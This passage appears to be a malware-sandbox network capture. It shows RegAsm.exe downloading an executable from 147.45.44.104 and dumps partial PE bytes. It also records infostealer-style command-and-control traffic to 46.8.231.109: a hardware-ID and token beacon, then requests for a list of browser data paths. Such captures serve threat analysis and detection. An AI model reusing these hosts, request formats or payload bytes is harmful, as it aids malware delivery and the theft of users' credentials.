                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 20 06 00 00 06 00 00 00 00 00 00 ee 3e 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 a1 95 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 3e 06 00 53 00 00 00 00 40 06 00 42 02 00 00 00 00 00 00 00 00 00 00 78 51 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 60 3d 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0f > @@ `>S@BxQ(&``= H.text `.rsrcB@"@@.reloc`&@B>H@+ B,Je8*Xf3Zmv$:rXM6'4,OT!BC|[{2yd?1d2mU5A93B[ltP3fA*yz$[Yi[v\Bqg^pd{t}y*[PvyH @'2^4h7!OwJxiv?G6^`q8NZ-TuW1zK_*7-H<fz(7-@{%xB#"S4
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409579039 CEST1236INData Raw: ea 2c 4e af 9d f1 ad fe a3 ce 11 d4 91 82 69 4f dc df 93 1b de fd c1 23 54 b7 a1 91 d5 00 dc 6a 4e bc 46 c3 41 19 10 12 ed ba 0a e8 68 cc 6a be 05 70 86 96 cb 22 26 d3 78 55 2d e0 cd d2 60 0b 8d 08 c2 34 c9 af 91 0e e8 a2 32 2a c0 e6 26 eb f8 48
                                                                                                                                                                                                                                          Data Ascii: ,NiO#TjNFAhjp"&xU-`42*&H*_\Jn@ #}&rx!F$N/Xisx0+aNux#YD;X@c_a)|i-?so-f/nkj/8{,jyweJ
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409629107 CEST248INData Raw: 59 3c 7e 25 7f ff 0c cd 0a e6 cf f9 f5 6f 25 ec 4e 1d 9f c5 4b 70 3f 62 b1 1c 03 8c 71 f9 fb 6a c6 ba e7 02 26 de 61 9b 64 af c8 cb 28 66 e8 63 47 8b e7 7b 56 64 29 10 12 c9 77 b2 f7 20 c0 86 1d c2 d6 a7 97 c7 a6 7e 39 23 f0 bc a6 a2 10 5a 77 3c
                                                                                                                                                                                                                                          Data Ascii: Y<~%o%NKp?bqj&ad(fcG{Vd)w ~9#Zw<e%P]"3bYdgP'T|Y}!S4E~R%?[_7B$+Ne<knB{'sUvz2G7O,]9xntxBZpg%}]L'k
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409658909 CEST1236INData Raw: d6 d3 7c 42 46 84 33 6f d8 1b c2 89 14 8d 82 b7 b6 0b d7 d4 bb 9e fa a2 f2 ac d4 59 ad 19 3b 4f 68 4f f0 54 27 e3 94 c0 35 86 3f 0d e3 cd 03 cf f4 54 44 f2 58 eb 21 2f b1 cf 78 4d ae d4 29 85 7f 10 e7 28 f0 cb 63 bb 49 3e ec 33 18 f3 e9 d9 db 2e
                                                                                                                                                                                                                                          Data Ascii: |BF3oY;OhOT'5?TDX!/xM)(cI>3.H^SrWQ5BnAUsZr8}q6W')LO%Bn1=f8xDIL9NrQg3[G5?
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409693956 CEST1236INData Raw: 42 e9 ae c9 34 fa 6c 09 f6 7d f8 fa 7a 80 07 9a dd e3 4a d8 5f fe 18 ee 08 3c 69 56 30 37 a2 bc 96 2c 8e 62 3d d8 2a 21 1f c1 26 eb 6a f4 b7 f3 71 2b da 9e 54 0e 19 32 fd fb 80 59 27 78 a9 1f be 5f 80 24 84 d4 8a c2 c8 a7 d8 e4 2f 17 09 66 83 0f
                                                                                                                                                                                                                                          Data Ascii: B4l}zJ_<iV07,b=*!&jq+T2Y'x_$/f0e9]+o=NF2g*oP2;}Gu-Pj[dA5'EC0S\9#ruwuFjeU)Q0fV{u@2TKyskge)+GrMv7
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409728050 CEST1236INData Raw: 39 31 05 6f 3c 4b a9 f7 77 0c 33 16 93 ff 1f 0c cb 8e f5 70 27 1d 2a ab d5 57 d5 d2 03 56 9f ad 14 6a 1a 18 9a cc 6e 07 ba 4b c6 dc db 5d 94 e3 3d 7f 3a ab 38 a1 24 d1 59 32 50 9b 5a 76 c7 a5 75 8f 62 7c bc bf 97 6a b5 35 01 92 dd 81 ca 87 1b 0d
                                                                                                                                                                                                                                          Data Ascii: 91o<Kw3p'*WVjnK]=:8$Y2PZvub|j5d#.zjeEkRsyNv9pmY4fQ@~m6qI+'%@y9g-M^6wJ~)CX74B50nuc7yb-(m
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409759045 CEST1236INData Raw: 30 e7 7d 39 7e 8b 32 4a d6 ef ef 9b 71 5e f9 10 c8 5b bd 78 90 02 3b 4b 16 d3 80 11 04 27 71 1e 47 ee 08 16 62 1f 0c 06 6e 21 b2 92 c5 18 f0 9a 73 e6 b3 82 0f de 62 16 e3 55 38 d6 b9 f5 06 d1 82 ee ae ad 95 1d 33 dd 55 ef d1 f4 46 f5 09 12 66 68
                                                                                                                                                                                                                                          Data Ascii: 0}9~2Jq^[x;K'qGbn!sbU83UFfh(Z7\mM`Nox.<jj/3i3gu:g~(rtON8&?J'pEUpWPK\i4GR_rw/0i=R!6mX6[h5o'sI
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409791946 CEST1236INData Raw: 3e b2 a9 2d d8 46 bd 0e 24 73 bf 98 1b 82 96 bd 4d 9c 48 92 ac 42 b9 b2 24 2e 34 cc 70 3d 09 95 b8 86 aa a2 27 9a f4 21 36 0b 91 c1 cb 1d 37 9d f6 95 b0 f4 2e 18 6c e9 53 8f 01 cc 01 e0 a3 78 84 79 3c 9c 6d 50 66 92 0a 92 42 76 c6 56 96 e0 05 71
                                                                                                                                                                                                                                          Data Ascii: >-F$sMHB$.4p='!67.lSxy<mPfBvVqKm~2 M(YYYr >.w =\(g3.R5Iyzc;@IoPyG,Igfg&usDv=z0dF7l
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409823895 CEST1236INData Raw: 34 35 c0 2c 39 b2 3b b8 18 51 77 33 6a 9d bb 30 ed 6c d3 7a 65 cc 06 d9 92 94 f9 c0 68 d0 b7 9c e2 0d 98 df 54 e8 e7 c8 17 86 57 0b 18 9d b9 c7 65 11 da 0f 1e 98 f5 22 48 a7 0e f9 46 31 e2 a1 f6 38 12 54 91 b8 e2 42 fb 99 c2 be f5 b3 fa 1e 48 a8
                                                                                                                                                                                                                                          Data Ascii: 45,9;Qw3j0lzehTWe"HF18TBH,n#QZv+mFhQX[InuSUvB{c*l]xst4:ege<Un-mvTPjeG3R_^_MKB. Zq&,9
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409857035 CEST1236INData Raw: 12 69 3a 82 58 b0 46 a8 2d 98 1d 46 a7 99 bb 60 92 8b 7d 5e 73 9f 0a 9c dd 41 9f 34 8a 64 30 bb 19 e9 a0 0e 87 32 ff 7a 06 cc 55 58 58 e2 6f 23 2d 14 8b c8 0c 41 6c d8 9b 88 40 ae b5 6b 27 e6 ac d3 8e 91 83 44 15 d4 97 01 38 0b d8 de 4f 4b 25 7f
                                                                                                                                                                                                                                          Data Ascii: i:XF-F`}^sA4d02zUXXo#-Al@k'D8OK%L4H}AkKI5SO98`cVo$KL1,pbP%,GOa`uVaAB<=50qz_=R_Cfl
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.409894943 CEST1236INData Raw: bc 38 00 3b c1 ad a0 b9 32 30 aa 63 13 3e 5f f0 a5 ef b1 40 d6 e2 de af 7b ee 66 6b fd 13 e6 6e 1f 20 97 99 8e d1 64 67 0a 5f 74 4f 9c 22 b5 e9 6d 4d a8 7e 35 2a 6c a6 f6 41 fd de 42 0b 12 0c 05 75 02 e7 31 d4 e2 ad 62 38 f9 34 6f 7b 6d 5d a0 be
                                                                                                                                                                                                                                          Data Ascii: 8;20c>_@{fkn dg_tO"mM~5*lABu1b84o{m]hW\1ZoTQk'?#W>gYUKCVu?&uGq+,(v~#VsdGzE5l,g7wi/k/c#C~D2LazR42vbx1pK&d*^>djJ!


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          4192.168.2.649726147.45.44.10480364C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:00.590821028 CEST217OUTHEAD /prog/66fbfcc301a31_swws.exe HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: 147.45.44.104
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.269768000 CEST309INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:01 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 344992
                                                                                                                                                                                                                                          Last-Modified: Tue, 01 Oct 2024 13:44:35 GMT
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=120
                                                                                                                                                                                                                                          ETag: "66fbfcc3-543a0"
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.270184994 CEST216OUTGET /prog/66fbfcc301a31_swws.exe HTTP/1.1
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Host: 147.45.44.104
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.458924055 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:01 GMT
                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                          Content-Length: 344992
                                                                                                                                                                                                                                          Last-Modified: Tue, 01 Oct 2024 13:44:35 GMT
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Keep-Alive: timeout=120
                                                                                                                                                                                                                                          ETag: "66fbfcc3-543a0"
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ec 04 00 00 06 00 00 00 00 00 00 ee 0a 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 d7 37 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 0a 05 00 53 00 00 00 00 20 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 1d 05 00 28 26 00 00 00 40 05 00 0c 00 00 00 60 09 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf @ `7`S Bx(&@` H.text `.rsrcB @@.reloc@@BH@ +>J]y 9=5tS4;g/kTl>GPOCB$!xVX,7DqRY\8`Mc6`D6bye>Ty"lZD;6FN6T^:z_'_r;n8Ua<D84OvZ2j;o9;a}yR\`2fvJC*Dcu'^,bF^IeHN!&xD"5zJsEHb&DI9Zl{,wF-
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.458966970 CEST1236INData Raw: 4f d7 1f fa 1d 32 c5 a8 fe 87 41 6b a4 38 d5 3c 8c 21 40 40 61 27 1e d4 db 32 9a 0c c8 41 e5 09 15 18 25 d2 6c 0b 8f 3f 1e 61 3c 79 88 d3 b2 af 82 f8 36 7a 5a b0 04 ae 02 db 27 fb 16 37 d5 f7 51 b2 ce 8e d2 ee 8c 76 3e 83 58 84 36 82 1b 2f a2 64
                                                                                                                                                                                                                                          Data Ascii: O2Ak8<!@@a'2A%l?a<y6zZ'7Qv>X6/db xzYCy:Oo@5vNd|kOPP]RO7NkBIRD4$b@Ae# =<<_m?ORix9#ICNZPgDB0uo(6>A4VH j
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459018946 CEST448INData Raw: 60 fb c3 81 c3 d1 04 9f 4d 0e ac be 20 5b 52 55 c4 05 dd 77 5c da 5d 3a 09 2b 0a c8 18 c3 0c 59 e2 41 c2 15 7f ea d6 75 d9 ae 9d 9b e0 5e 70 0c 66 d2 ba 0a b3 ac ac ac bb 09 ce b8 4a 2a ff ac b6 16 79 70 6c b6 d4 1f ce 1e 7e 08 31 96 e0 23 f2 d8
                                                                                                                                                                                                                                          Data Ascii: `M [RUw\]:+YAu^pfJ*ypl~1#Yjvc93H1S=6{835ZbmH='Yf'NKr;9+:]bD)A3|%om1<<(_{6DvN+,'KQDQJxl
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459072113 CEST1236INData Raw: ac cf 13 87 4f 5b ad 53 07 29 f0 5e 15 a5 4a b3 97 f0 fe 00 e0 07 14 07 7f b1 41 c6 78 32 16 24 7a 97 9d 20 b5 54 73 76 4e 12 12 76 13 2f f7 69 d5 46 f6 68 bb ea dc 52 8f 7a 96 e7 21 f6 15 2b c5 c6 8d 47 20 c1 53 32 97 0f 93 25 86 a5 39 d6 0d ad
                                                                                                                                                                                                                                          Data Ascii: O[S)^JAx2$z TsvNv/iFhRz!+G S2%9&-/1@T>LsEqtjUa+l?Q)qS&0Lh]N A4.Mv=\DsIH duR`4U5Toh*#A%Ke
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459120989 CEST1236INData Raw: 59 be ba 13 69 c3 02 51 95 8f 95 ea 4f 4c 21 09 b2 cf f5 4b 3e 9c ea 76 b7 af 44 ab 95 a5 50 39 41 6e 55 3c 9e 64 f7 ef 57 a2 2d be cd e1 49 b2 1a 6c 9e a0 e5 19 24 c7 70 b1 27 20 7b 40 ba fb b6 d1 ba 56 ca ac 25 92 94 08 22 09 62 9c 1c 0c cf 4b
                                                                                                                                                                                                                                          Data Ascii: YiQOL!K>vDP9AnU<dW-Il$p' {@V%"bKy`3PUm?H0xPw3wbf(y}",`}e~.1{fc49gRF[b>~/o+B(UeDU.W$#aEoID0H1ez{'(R*
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459141970 CEST1236INData Raw: 6d 89 1f 9a bc 68 9a 4e cb c7 3f 33 ae bf 60 c9 1c da 96 7a b0 7e 0b d9 e7 f6 bc c8 3c 2e fb 83 31 13 fb 82 0e 03 f9 f3 30 f2 53 b2 96 af e3 44 e8 1b 45 e0 02 34 a1 d0 16 6e 14 a5 7e e7 cc 87 48 3e f1 76 ff a1 13 62 27 59 41 5b a0 2b 02 52 13 08
                                                                                                                                                                                                                                          Data Ascii: mhN?3`z~<.10SDE4n~H>vb'YA[+R+;U&lA':2cOj*$r$d{t=IuLVpkvj'B#`&u:aC^wr*\vNfW|Kn^C;
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459156036 CEST1236INData Raw: d9 cd 07 7c 49 a8 23 86 cf 98 18 a5 1d 3c 8d 1f f8 15 2d 19 d3 07 d1 7e c5 03 7e b2 9f d1 84 4f 69 c3 ca 0d 4f ae b4 7c 37 4a 85 93 bf 3f 53 f8 53 b8 98 13 4a 08 ca 12 b3 57 51 09 f8 16 a7 9e 21 f8 f0 bb 56 84 a2 d5 f4 24 42 82 7b aa 60 8a d1 53
                                                                                                                                                                                                                                          Data Ascii: |I#<-~~OiO|7J?SSJWQ!V$B{`S[xf"<u]oc&B"dssNER2vne^6t_88H6e1a-M@kN0K*fcz%(QO1`7_f=&<l=pKJv; !
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459171057 CEST328INData Raw: ac b4 9b e7 83 b1 ac 4b 9a e6 64 69 0a d3 9f 7d 30 c0 53 62 33 a6 25 22 c5 66 d2 d2 80 19 cd f8 c9 75 64 54 76 57 ea 2c 31 1e 59 b1 dc 6a ea c0 47 f3 16 13 a0 49 4b 35 2c 5a db dd 98 0c 5f 66 26 74 05 f0 25 3d a7 6a 56 70 5b 30 4c 15 27 fb d0 bc
                                                                                                                                                                                                                                          Data Ascii: Kdi}0Sb3%"fudTvW,1YjGIK5,Z_f&t%=jVp[0L'=F{,A_d^C5:F'#a7q%j,n\Tamw^UjFt&4}A7MQZ=XWQr?"O'}v+r[rWIr{4}j
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459184885 CEST1236INData Raw: 2c 64 b6 af 1f 49 2a 2b 0b 3a bd e1 19 ad 1d 58 4a 4d 78 ba 1f ba 4c 2a 71 66 ba 25 da a3 d3 8c e3 2f f2 64 24 5e ef c4 75 8e 4b e6 cc e6 fa ed d9 9b ea c3 c1 6b 05 18 5c bd 0b 52 e9 70 70 ea 32 51 95 f6 3f 15 fa c1 bd 41 83 a6 76 f7 f2 f0 1d 4e
                                                                                                                                                                                                                                          Data Ascii: ,dI*+:XJMxL*qf%/d$^uKk\Rpp2Q?AvN*$-Z}V4`dR:3F=CH'lep~GVW]9IxN>\31%~`&Exkw{pa`<RN^ATDUkzB&3n-;Pv5
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459199905 CEST1236INData Raw: 64 e6 d8 93 d9 4f 6e ff 8a ce 69 19 3c 29 9b b9 81 c6 76 67 bb a7 3e 56 8e d7 0f ae 9e 28 bd 31 33 1c 5d 1e 16 46 6c 99 08 e4 b2 27 8e 2c c6 2a dc 8c 1c be b1 6b 21 2f 3e 91 77 8d a9 c0 89 e8 73 ba d6 47 6d 30 60 35 24 a6 8e 48 3c 64 f8 23 da 08
                                                                                                                                                                                                                                          Data Ascii: dOni<)vg>V(13]Fl',*k!/>wsGm0`5$H<d#~P45b~oX75GCFR<wr/<iT[5X6LPx_BwQX3%%a[>yCJs3iJq$7&/3)B=k:]j`ws8T
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:01.459213018 CEST1236INData Raw: d5 80 75 e9 11 2f 67 ba 43 8c db 7a 47 cb 28 fe 4d 79 e3 03 f5 9e ea 19 e0 c0 f9 a8 0f f4 3f 0a 52 e9 d7 36 0d 7a 5b 0d 98 c3 df 83 7d 02 57 bb 7f 03 27 33 9c d0 db 44 6d f5 9d 27 0c 09 61 2f 66 5b 8e 82 c0 e1 38 b1 95 1b f0 e5 e4 01 af 78 38 d7
                                                                                                                                                                                                                                          Data Ascii: u/gCzG(My?R6z[}W'3Dm'a/f[8x80Ql5o'!a3\E GLKr:>(nT~Ke-mTG&'VW,mhRC/i9q;fJ4BQ']Wt


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          5192.168.2.65851546.8.231.109802632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:04.684761047 CEST87OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:05.386965990 CEST203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:05 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:05.453649998 CEST413OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHC
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 214
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 30 38 43 39 33 43 36 34 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"7C08C93C64433430373531------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"default------KJKJJEGIDBGIDGCBAFHC--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:05.794930935 CEST407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:05 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 180
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 5a 44 59 79 4e 57 59 30 4d 57 45 78 4f 44 51 35 4e 6a 49 31 4d 57 4d 77 4f 57 4e 6b 5a 6d 45 30 59 32 52 69 4d 57 46 6d 4f 47 59 33 4f 44 46 6c 5a 44 41 77 59 54 41 7a 5a 47 5a 6d 4f 47 51 32 4e 32 45 31 4d 6a 51 31 5a 54 6b 7a 5a 44 4e 6a 4d 6d 56 6d 59 57 51 78 4d 44 45 31 4e 57 4a 6d 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                          Data Ascii: ZDYyNWY0MWExODQ5NjI1MWMwOWNkZmE0Y2RiMWFmOGY3ODFlZDAwYTAzZGZmOGQ2N2E1MjQ1ZTkzZDNjMmVmYWQxMDE1NWJmfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:05.821641922 CEST467OUTPOST /c4754d4f680ead72.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB
                                                                                                                                                                                                                                          Host: 46.8.231.109
                                                                                                                                                                                                                                          Content-Length: 268
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a
                                                                                                                                                                                                                                          Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="message"browsers------GHCGDAFCFHIDBGDHCFCB--
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:06.002038956 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:05 GMT
                                                                                                                                                                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          Content-Length: 1520
                                                                                                                                                                                                                                          Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
